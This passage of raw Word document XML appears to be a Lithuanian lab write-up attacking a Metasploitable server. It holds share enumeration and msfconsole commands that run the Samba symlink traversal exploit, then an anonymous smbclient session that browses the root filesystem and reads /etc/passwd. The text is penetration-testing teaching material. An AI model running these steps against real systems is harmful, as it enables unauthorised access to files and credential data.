        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Drivers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="591BFD18" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>             Disk      Mūsų tikslas!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C958DD" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>opt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>             Disk     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4462D347" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">        IPC$            IPC       </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>IPC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Service</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Samba 3.0.20-Debian))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E501F17" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">        ADMIN$          IPC       </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>IPC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Service</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Samba 3.0.20-Debian))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C57619" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C504E28"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w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5FD353C3"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&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>use</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>auxiliary</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>samba_symlink_traversal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="49413ABA"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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>auxiliary</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>samba_symlink_traversal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">) &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> RHOST IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6676D812"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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>auxiliary</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>samba_symlink_traversal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">) &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> SMBSHARE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="784C16F5"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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>auxiliary</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>samba_symlink_traversal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">) &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1A19AED7" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>auxiliary</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>samba_symlink_traversal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">) &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>exit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="66552F11" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CFB8B85" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>root@linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>:~#</w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> //IP/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0924602F" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Anonymous</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>successful</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="538AB015" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Domain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>=[WORKGROUP] OS=[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>] Server=[Samba 3.0.20-Debian]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A91FAA3" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">: \&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">cd </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>rootfs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1D48ED00" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>: \</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>rootfs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">\&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">cd </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="11B8CBCE" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>: \</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>rootfs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">\&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>more</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>passwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="796F5727" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>getting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>file</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> \</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>rootfs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>passwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>size</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1624 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>as</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
